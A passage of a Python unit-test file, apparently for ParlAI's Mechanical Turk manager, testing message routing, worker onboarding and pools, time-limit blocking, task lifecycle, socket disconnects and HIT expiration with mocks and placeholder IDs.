manager._on_socket_dead.reset_mock()
self.assertTrue(agent.hit_is_returned)
# Test SNS_ASSIGN_SUBMITTED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
agent.hit_is_complete = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_not_called()
self.assertTrue(agent.hit_is_complete)
def test_new_message(self):
"""
        Test on_new_message packet routing.
"""
alive_packet = Packet(
'',
TEST_WORKER_ID_1,
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
message_packet = Packet(
'',
'',
MTurkManagerFile.AMAZON_SNS_NAME,
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
manager = self.mturk_manager
manager._handle_mturk_message = mock.MagicMock()
manager.worker_manager.route_packet = mock.MagicMock()
        # test a regular agent message (routed to the worker manager)
manager._on_new_message(alive_packet)
manager._handle_mturk_message.assert_not_called()
manager.worker_manager.route_packet.assert_called_once_with(alive_packet)
manager.worker_manager.route_packet.reset_mock()
        # test an MTurk system message (handled by _handle_mturk_message)
manager._on_new_message(message_packet)
manager._handle_mturk_message.assert_called_once_with(message_packet)
manager.worker_manager.route_packet.assert_not_called()
@testing_utils.retry()
def test_onboarding_function(self):
manager = self.mturk_manager
manager.onboard_function = mock.MagicMock()
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager._move_agents_to_waiting = mock.MagicMock()
manager.worker_manager.get_agent_for_assignment = mock.MagicMock(
return_value=self.agent_1
)
onboard_threads = manager.assignment_to_onboard_thread
did_launch = manager._onboard_new_agent(self.agent_1)
        assert_equal_by(onboard_threads[self.agent_1.assignment_id].is_alive, True, 0.2)
time.sleep(0.1)
manager.worker_manager.change_agent_conversation.assert_called_once()
manager.worker_manager.change_agent_conversation.reset_mock()
manager.onboard_function.assert_not_called()
self.assertTrue(did_launch)
# Thread will be waiting for agent_1 status to go to ONBOARDING, ensure
# won't start new thread on a repeat call when first still alive
did_launch = manager._onboard_new_agent(self.agent_1)
time.sleep(0.2)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.worker_manager.get_agent_for_assignment.assert_not_called()
manager.onboard_function.assert_not_called()
self.assertFalse(did_launch)
# Advance the worker to simulate a connection, assert onboarding goes
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
        assert_equal_by(onboard_threads[self.agent_1.assignment_id].is_alive, False, 0.6)
manager.onboard_function.assert_called_with(self.agent_1)
manager._move_agents_to_waiting.assert_called_once()
# Try to launch a new onboarding world for the same agent still in
# onboarding, assert that this call is ignored.
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertFalse(did_launch)
# Try to launch with an agent that was in none but supposedly launched
# before
self.agent_1.set_status(AssignState.STATUS_NONE)
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertTrue(did_launch)
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
def test_agents_incomplete(self):
agents = [self.agent_1, self.agent_2, self.agent_3]
manager = self.mturk_manager
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_2.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_DONE)
self.assertTrue(manager._no_agents_incomplete(agents))
def test_world_types(self):
onboard_type = 'o_12345'
waiting_type = 'w_12345'
task_type = 't_12345'
garbage_type = 'g_12345'
manager = self.mturk_manager
self.assertTrue(manager.is_onboarding_world(onboard_type))
self.assertTrue(manager.is_task_world(task_type))
self.assertTrue(manager.is_waiting_world(waiting_type))
for world_type in [waiting_type, task_type, garbage_type]:
self.assertFalse(manager.is_onboarding_world(world_type))
for world_type in [onboard_type, task_type, garbage_type]:
self.assertFalse(manager.is_waiting_world(world_type))
for world_type in [waiting_type, onboard_type, garbage_type]:
self.assertFalse(manager.is_task_world(world_type))
def test_turk_timeout(self):
"""
Timeout should send expiration message to worker and be treated as a disconnect
event.
"""
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
manager._handle_agent_disconnect = mock.MagicMock()
manager.handle_turker_timeout(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
manager.force_expire_hit.assert_called_once()
call_args = manager.force_expire_hit.call_args
self.assertEqual(call_args[0][0], TEST_WORKER_ID_1)
self.assertEqual(call_args[0][1], TEST_ASSIGNMENT_ID_1)
manager._handle_agent_disconnect.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
@testing_utils.retry()
def test_wait_for_task_expirations(self):
"""
Ensure waiting for expiration time actually works out.
"""
manager = self.mturk_manager
manager.opt['assignment_duration_in_seconds'] = 0.5
manager.expire_all_unassigned_hits = mock.MagicMock()
manager.hit_id_list = [1, 2, 3]
def run_task_wait():
manager._wait_for_task_expirations()
wait_thread = threading.Thread(target=run_task_wait, daemon=True)
wait_thread.start()
time.sleep(0.1)
        self.assertTrue(wait_thread.is_alive())
        assert_equal_by(wait_thread.is_alive, False, 0.6)
def test_mark_workers_done(self):
manager = self.mturk_manager
manager.give_worker_qualification = mock.MagicMock()
manager._log_working_time = mock.MagicMock()
manager.has_time_limit = False
# Assert finality doesn't change
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
manager.mark_workers_done([self.agent_1])
self.assertEqual(AssignState.STATUS_DISCONNECT, self.agent_1.get_status())
# assert uniqueness works as expected
manager.is_unique = True
with self.assertRaises(AssertionError):
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_not_called()
manager.unique_qual_name = 'fake_qual_name'
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_called_once_with(
self.agent_2.worker_id, 'fake_qual_name'
)
self.assertEqual(self.agent_2.get_status(), AssignState.STATUS_DONE)
manager.is_unique = False
# Ensure working time is called if it's set
manager.has_time_limit = True
manager.mark_workers_done([self.agent_3])
self.assertEqual(self.agent_3.get_status(), AssignState.STATUS_DONE)
manager._log_working_time.assert_called_once_with(self.agent_3)
class TestMTurkManagerPoolHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_pool_add_get_remove_and_expire(self):
"""
Ensure the pool properly adds and releases workers.
"""
all_are_eligible = {'multiple': True, 'func': lambda workers: workers}
manager = self.mturk_manager
# Test empty pool
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test pool add and get
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
manager._add_agent_to_pool(self.agent_3)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test extra add to pool has no effect
manager._add_agent_to_pool(self.agent_1)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test remove from the pool works:
manager._remove_from_agent_pool(self.agent_2)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible), [self.agent_1, self.agent_3]
)
# Test repeated remove fails
with self.assertRaises(AssertionError):
manager._remove_from_agent_pool(self.agent_2)
# Test eligibility function
second_worker_only = {'multiple': True, 'func': lambda workers: [workers[1]]}
self.assertListEqual(
manager._get_unique_pool(second_worker_only), [self.agent_3]
)
# Test single eligibility function
only_agent_1 = {
'multiple': False,
'func': lambda worker: worker is self.agent_1,
}
self.assertListEqual(manager._get_unique_pool(only_agent_1), [self.agent_1])
# Test expiration of pool
manager.force_expire_hit = mock.MagicMock()
manager._expire_agent_pool()
manager.force_expire_hit.assert_any_call(
self.agent_1.worker_id, self.agent_1.assignment_id
)
manager.force_expire_hit.assert_any_call(
self.agent_3.worker_id, self.agent_3.assignment_id
)
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test adding two agents from the same worker
self.agent_2.worker_id = self.agent_1.worker_id
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
# both workers are in the pool
self.assertListEqual(manager.agent_pool, [self.agent_1, self.agent_2])
# Only one worker per unique list though
manager.is_sandbox = False
self.assertListEqual(manager._get_unique_pool(all_are_eligible), [self.agent_1])
class TestMTurkManagerTimeHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager.time_limit_checked = time.time()
self.mturk_manager.worker_manager.un_time_block_workers = mock.MagicMock()
self.mturk_manager.worker_manager.time_block_worker = mock.MagicMock()
self.old_time = MTurkManagerFile.time
MTurkManagerFile.time = mock.MagicMock()
MTurkManagerFile.time.time = mock.MagicMock(return_value=0)
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
def tearDown(self):
self.mturk_manager.shutdown()
MTurkManagerFile.time = self.old_time
def test_create_work_time_file(self):
manager = self.mturk_manager
manager._should_use_time_logs = mock.MagicMock(return_value=True)
file_path = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_LOCK)
# No lock should exist already
self.assertFalse(os.path.exists(file_lock))
# open the work time file, ensure it was just updated
MTurkManagerFile.time.time = mock.MagicMock(return_value=42424242)
manager._reset_time_logs(force=True)
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
self.assertEqual(existing_times['last_reset'], 42424242)
self.assertEqual(len(existing_times), 1)
# Try to induce a check, ensure it doesn't fire because too recent
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Try to induce a check, ensure it doesn't fire because outside of 30
# minute window
MTurkManagerFile.time.time = mock.MagicMock(
return_value=(60 * 60 * 24 * 1000) + (60 * 40)
)
manager.time_limit_checked = 0
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Induce a check
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
self.assertEqual(manager.time_limit_checked, (60 * 60 * 24 * 1000))
def test_add_to_work_time_file_and_block(self):
manager = self.mturk_manager
self.agent_1.creation_time = 1000
self.agent_2.creation_time = 1000
manager.opt['max_time'] = 10000
# Ensure a worker below the time limit isn't blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=10000)
self.mturk_manager._should_use_time_logs = mock.MagicMock(return_value=True)
manager._log_working_time(self.agent_1)
manager.worker_manager.time_block_worker.assert_not_called()
# Ensure a worker above the time limit is blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=100000)
manager._log_working_time(self.agent_2)
manager.worker_manager.time_block_worker.assert_called_with(
self.agent_2.worker_id
)
# Ensure on a (forced) reset all workers are freed
manager._reset_time_logs(force=True)
manager.worker_manager.un_time_block_workers.assert_called_once()
args = manager.worker_manager.un_time_block_workers.call_args
worker_list = args[0][0]
self.assertIn(self.agent_1.worker_id, worker_list)
self.assertIn(self.agent_2.worker_id, worker_list)
class TestMTurkManagerLifecycleFunctions(unittest.TestCase):
def setUp(self):
self.fake_socket = MockSocket()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['task_description'] = 'Test task description'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
MTurkManagerFile.server_utils.delete_server = mock.MagicMock()
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
@testing_utils.retry()
def test_full_lifecycle(self):
manager = self.mturk_manager
server_url = 'https://fake_server_url'
topic_arn = 'aws_topic_arn'
mturk_page_url = 'https://test_mturk_page_url'
MTurkManagerFile.server_utils.setup_server = mock.MagicMock(
return_value=server_url
)
MTurkManagerFile.server_utils.setup_legacy_server = mock.MagicMock(
return_value=server_url
)
# Currently in state created. Try steps that are too soon to work
with self.assertRaises(AssertionError):
manager.start_new_run()
with self.assertRaises(AssertionError):
manager.start_task(None, None, None)
        # Set up the server but fail due to insufficient funds
manager.opt['local'] = True
MTurkManagerFile.input = mock.MagicMock()
MTurkManagerFile.mturk_utils.setup_aws_credentials = mock.MagicMock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=False
)
MTurkManagerFile.mturk_utils.calculate_mturk_cost = mock.MagicMock(
return_value=10
)
with self.assertRaises(SystemExit):
manager.setup_server()
MTurkManagerFile.mturk_utils.setup_aws_credentials.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.input.assert_called()
        # Two calls to input if local is set
self.assertEqual(len(MTurkManagerFile.input.call_args_list), 2)
# Test successful setup
manager.opt['local'] = False
MTurkManagerFile.input.reset_mock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=True
)
MTurkManagerFile.mturk_utils.create_hit_config = mock.MagicMock()
manager.setup_server()
# Copy one file for cover page, 2 workers, and 1 onboarding
self.assertEqual(len(manager.task_files_to_copy), 4)
self.assertEqual(manager.server_url, server_url)
self.assertIn('unittest', manager.server_task_name)
MTurkManagerFile.input.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.mturk_utils.create_hit_config.assert_called_once()
self.assertEqual(manager.task_state, manager.STATE_SERVER_ALIVE)
# Start a new run
MTurkManagerFile.mturk_utils.setup_sns_topic = mock.MagicMock(
return_value=topic_arn
)
manager._init_state = mock.MagicMock(wraps=manager._init_state)
manager.start_new_run()
manager._init_state.assert_called_once()
MTurkManagerFile.mturk_utils.setup_sns_topic.assert_called_once_with(
manager.opt['task'], manager.server_url, manager.task_group_id
)
self.assertEqual(manager.topic_arn, topic_arn)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
# connect to the server
manager._setup_socket = mock.MagicMock()
manager.ready_to_accept_workers()
manager._setup_socket.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_ACCEPTING_WORKERS)
# 'launch' some hits
manager.create_additional_hits = mock.MagicMock(return_value=mturk_page_url)
hits_url = manager.create_hits()
manager.create_additional_hits.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_HITS_MADE)
self.assertEqual(hits_url, mturk_page_url)
# start a task
manager.num_conversations = 10
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
# Run a task, ensure it closes when the max convs have been 'had'
def run_task():
manager.start_task(lambda worker: True, None, None)
task_thread = threading.Thread(target=run_task, daemon=True)
task_thread.start()
        self.assertTrue(task_thread.is_alive())
manager.started_conversations = 10
manager.completed_conversations = 10
        assert_equal_by(task_thread.is_alive, False, 0.6)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
# shutdown
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
manager._wait_for_task_expirations = mock.MagicMock()
MTurkManagerFile.mturk_utils.delete_sns_topic = mock.MagicMock()
manager.shutdown()
self.assertTrue(manager.is_shutdown)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
manager._wait_for_task_expirations.assert_called_once()
MTurkManagerFile.server_utils.delete_server.assert_called_once()
MTurkManagerFile.mturk_utils.delete_sns_topic.assert_called_once_with(topic_arn)
class TestMTurkManagerConnectedFunctions(unittest.TestCase):
"""
Semi-unit semi-integration tests on the more state-dependent MTurkManager
functionality.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager._onboard_new_agent = mock.MagicMock()
self.mturk_manager._wait_for_task_expirations = mock.MagicMock()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_ACCEPTING_WORKERS
self.mturk_manager._setup_socket()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_2,
'hit_id': TEST_HIT_ID_2,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
self.agent_1 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_1
)
self.agent_2 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_2
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_socket_dead(self):
"""
Test all states of socket dead calls.
"""
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
manager.socket_manager.close_channel = mock.MagicMock()
agent.reduce_state = mock.MagicMock()
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._handle_agent_disconnect = mock.MagicMock(
wraps=manager._handle_agent_disconnect
)
# Test status none
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
manager._handle_agent_disconnect.assert_not_called()
# Test status onboarding
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
self.assertFalse(agent.disconnected)
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
# test status waiting
agent.disconnected = False
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
manager._remove_from_agent_pool.assert_called_once_with(agent)
# test status in task
agent.disconnected = False
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_called_once_with(
worker_id, assignment_id
)
# test status done
agent.disconnected = False
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager._handle_agent_disconnect.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertNotEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
self.assertFalse(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
def test_send_message_command(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = self.agent_1.worker_id
assignment_id = self.agent_1.assignment_id
agent.set_last_command = mock.MagicMock()
manager.socket_manager.queue_packet = mock.MagicMock()
# Send a command
data = {'text': data_model.COMMAND_SEND_MESSAGE}
manager.send_command(worker_id, assignment_id, data)
agent.set_last_command.assert_called_once_with(data)
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertEqual(packet.data, data)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_COMMAND)
# Send a message
data = {'text': 'This is a test message'}
agent.set_last_command.reset_mock()
manager.socket_manager.queue_packet.reset_mock()
message_id = manager.send_message(worker_id, assignment_id, data)
agent.set_last_command.assert_not_called()
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertNotEqual(packet.data, data)
self.assertEqual(data['text'], packet.data['text'])
self.assertEqual(packet.data['message_id'], message_id)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_MESSAGE)
def test_free_workers(self):
manager = self.mturk_manager
manager.socket_manager.close_channel = mock.MagicMock()
manager.free_workers([self.agent_1])
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
def test_force_expire_hit(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
socket_manager = manager.socket_manager
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
# Test expiring finished worker
agent.set_status(AssignState.STATUS_DONE)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_not_called()
socket_manager.close_channel.assert_not_called()
self.assertEqual(agent.get_status(), AssignState.STATUS_DONE)
# Test expiring not finished worker with default args
agent.set_status(AssignState.STATUS_ONBOARDING)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
self.assertTrue(agent.hit_is_expired)
self.assertIsNotNone(data['inactive_text'])
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
# Test expiring not finished worker with custom arguments
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.hit_is_expired = False
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
special_disconnect_text = 'You were disconnected as part of a test'
test_ack_function = mock.MagicMock()
manager.force_expire_hit(
worker_id,
assignment_id,
text=special_disconnect_text,
ack_func=test_ack_function,
)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
self.assertTrue(agent.hit_is_expired)
self.assertEqual(data['inactive_text'], special_disconnect_text)
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
test_ack_function.assert_called()
def test_get_qualifications(self):
manager = self.mturk_manager
mturk_utils = MTurkManagerFile.mturk_utils
mturk_utils.find_or_create_qualification = mock.MagicMock()
# create a qualification list with nothing but a provided junk qual
fake_qual = {
'QualificationTypeId': 'fake_qual_id',
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept',
}
qualifications = manager.get_qualification_list([fake_qual])
self.assertListEqual(qualifications, [fake_qual])
self.assertListEqual(manager.qualifications, [fake_qual])
mturk_utils.find_or_create_qualification.assert_not_called()
        # Create a qualification list using all the default types
disconnect_qual_name = 'disconnect_qual_name'
disconnect_qual_id = 'disconnect_qual_id'
block_qual_name = 'block_qual_name'
block_qual_id = 'block_qual_id'
max_time_qual_name = 'max_time_qual_name'
max_time_qual_id = 'max_time_qual_id'
unique_qual_name = 'unique_qual_name'
unique_qual_id = 'unique_qual_id'
def return_qualifications(qual_name, _text, _sb):
if qual_name == disconnect_qual_name:
return disconnect_qual_id
if qual_name == block_qual_name:
return block_qual_id
if qual_name == max_time_qual_name:
return max_time_qual_id
if qual_name == unique_qual_name:
return unique_qual_id
mturk_utils.find_or_create_qualification = return_qualifications
manager.opt['disconnect_qualification'] = disconnect_qual_name
manager.opt['block_qualification'] = block_qual_name
manager.opt['max_time_qual'] = max_time_qual_name
manager.opt['unique_qual_name'] = unique_qual_name
manager.is_unique = True
manager.has_time_limit = True
manager.qualifications = None
qualifications = manager.get_qualification_list()
for qual in qualifications:
self.assertEqual(qual['ActionsGuarded'], 'DiscoverPreviewAndAccept')
self.assertEqual(qual['Comparator'], 'DoesNotExist')
for qual_id in [
disconnect_qual_id,
block_qual_id,
max_time_qual_id,
unique_qual_id,
]:
has_qual = False
for qual in qualifications:
if qual['QualificationTypeId'] == qual_id:
has_qual = True
break
self.assertTrue(has_qual)
self.assertListEqual(qualifications, manager.qualifications)
def test_create_additional_hits(self):
manager = self.mturk_manager
manager.opt['hit_title'] = 'test_hit_title'
manager.opt['hit_description'] = 'test_hit_description'
manager.opt['hit_keywords'] = 'test_hit_keywords'
manager.opt['reward'] = 0.1
mturk_utils = MTurkManagerFile.mturk_utils
fake_hit = 'fake_hit_type'
mturk_utils.create_hit_type = mock.MagicMock(return_value=fake_hit)
mturk_utils.subscribe_to_hits = mock.MagicMock()
mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=('page_url', 'hit_id', 'test_hit_response')
)
manager.server_url = 'test_url'
manager.task_group_id = 'task_group_id'
manager.topic_arn = 'topic_arn'
mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
manager.server_url, manager.task_group_id
)
hit_url = manager.create_additional_hits(5)
mturk_utils.create_hit_type.assert_called_once()
mturk_utils.subscribe_to_hits.assert_called_with(
fake_hit, manager.is_sandbox, manager.topic_arn
)
self.assertEqual(len(mturk_utils.create_hit_with_hit_type.call_args_list), 5)
mturk_utils.create_hit_with_hit_type.assert_called_with(
opt=manager.opt,
page_url=mturk_chat_url,
hit_type_id=fake_hit,
num_assignments=1,
is_sandbox=manager.is_sandbox,
)
self.assertEqual(len(manager.hit_id_list), 5)
self.assertEqual(hit_url, 'page_url')
def test_expire_all_hits(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
completed_hit_id = 'completed'
incomplete_1 = 'incomplete_1'
incomplete_2 = 'incomplete_2'
MTurkManagerFile.mturk_utils.expire_hit = mock.MagicMock()
worker_manager.get_complete_hits = mock.MagicMock(
return_value=[completed_hit_id]
)
manager.hit_id_list = [completed_hit_id, incomplete_1, incomplete_2]
